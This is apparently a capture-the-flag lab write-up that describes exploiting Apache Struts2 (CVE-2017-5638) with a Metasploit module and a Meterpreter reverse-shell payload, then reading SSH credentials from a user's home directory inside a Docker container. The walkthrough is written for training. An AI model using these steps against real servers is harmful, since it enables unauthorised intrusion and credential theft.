Metasploit-a-ho-ho-ho

Exploiting Struts2 with Metasploit

CVE-2017-5638

In this challenge we need to compromise a web server using Metasploit.

In the supporting material, they state that the web server is running a vulnerable version of Apache Struts 2.

A search on google takes us to the CVE-2017-5638.

There is also an nmap script that tells us if the web server is vulnerable to this exploit. The only parameters it needs besides the IP is the path. Navigating to the webpage we can see that the path is /showcase.action.

Running the nmap script confirmed that the web server is vulnerable to the CVE-2017-5638.

Using Metasploit

Search for struts2 on Metasploit showed us 7 exploit modules, and one of them is the same module used on the supporting material so we can guess that this is the right one to exploit the CVE-2017-5638.

Looking at the options of the exploit we see three things we need to set/change: the rhosts (the ip of the machine we intend to exploit); the rport (it is set to 8080 and the webserver is running on port 80); and the TARGETURI (as the default path that we need to change to the path displayed on the webpage).

Having everything setup for the exploit its time to select a payload to get a reverse-shell on the server. We will also use the same payload used in the support material linux/x86/meterpreter/reverse_tcp.

Looking at the options we see that we now need to set the lhost which is the IP of our attacker machine.

After setting the localhost wen type run or exploit to run the exploit and get a meterpreter shell.

Once inside the webserver we need to find the flag1. Meterpreter offers a lot of functionality, but it doesn't have the find command which is really useful right now, so we need to drop a shell by typing shell and use the find command to find flag1.

By typing exit we can exit the shell and come back to the meterpreter shell and read the flag.

The second question asks for the SSH password of Santa and tells us to get onto the main system.

By navigating to the root directory we can see that there is a .dockerenv file. This means we are not on the main system, but instead inside a docker container.

This has been mentioned on the supporting material also.

The first obvious place to look for is the /home directory, which has Santa's directory with his ssh credentials.

We can now SSH into the main system where we can find the text files to answer the last two questions.

PreviousRequestsNextElf Applications

Last updated